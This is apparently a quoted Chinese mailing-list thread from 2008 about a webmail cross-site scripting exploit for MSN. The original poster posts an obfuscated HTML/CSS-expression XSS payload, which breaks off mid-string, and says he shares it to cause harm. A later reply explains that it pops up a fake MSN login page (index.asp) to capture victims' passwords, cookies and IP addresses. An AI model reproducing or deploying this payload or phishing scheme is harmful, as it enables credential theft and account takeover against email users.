> 不知道你那里来的牛人,我一看你的回答还真以为我发了个垃圾东西,还特地跑去测试了下,可以正常使用
> 此跨站可以在目标客户看邮件的时候打开一个伪造的msn登录页面,要求客户重新输入密码,获取密码,cookies,来源ip,等信息
> 至于跨站里那个index.asp就是伪造的假登录页面
> 我猜你就不会使用,如何发html格式的邮件都不会,是你水平不够,不要乱咬人
> ayaREI通过吧,算是技术讨论
> 说起来,什么时候有的需要审核的规矩,奥运搞得?
>
> On 8月3日, 下午10时37分, <
Soloa...@gmail.com> wrote:
>
>
>
> > 1.根本就不是漏洞了就不应该拿出来忽悠人
> > 2.自己当作0day发出来之前不测试,既然有人测试或者知道行不通,至少应该让其他浏览网站的人知道省的误人子弟
>
> > On Aug 3, 11:59 am, ayaREI <
xuSoloawayew...@gmail.com> wrote:
>
> > > 若此帖再无技术性回复,将不再通过回复...请大家不要牵扯到多余话题。
>
> > > 在08-8-2,monkeycz <
monke...@gmail.com> 写道:
>
> > > > 如题,最新msn跨站代码,其实早就抓到了,但一直没用,一直在硬盘里扔着,最近心情不好,害人不利己的事偶最喜欢做了-_-!,大家抓紧时间玩吧
>
> > > > 有些牛要哭了,yahoo刚补,这个叫啥来的,恩,雪上加霜!
>
> > > > <font color="ffffff"> <div id="jmp" style="display:none">nop</div><div
> > > > id="ly" style="display:none">function ok(){return
> > > > true};window.onerror=ok</div><div id="tip" title="<a
> > > > style="display:none">" style="display:none"></div><div id="tap"
> > > > title="<" style="display:none"></div><div id="tep" title=">"
> > > > style="display:none"></div><style>div{background-image:expression(javascrip--t:1?document.write(EC_tip.title+';top:'+EC_tap.title+'/a'+EC_tep.title+EC_-t-ap.title+'script
> > > > id=nop'+EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/script'+EC_tep.title+EC--_tap.title+'script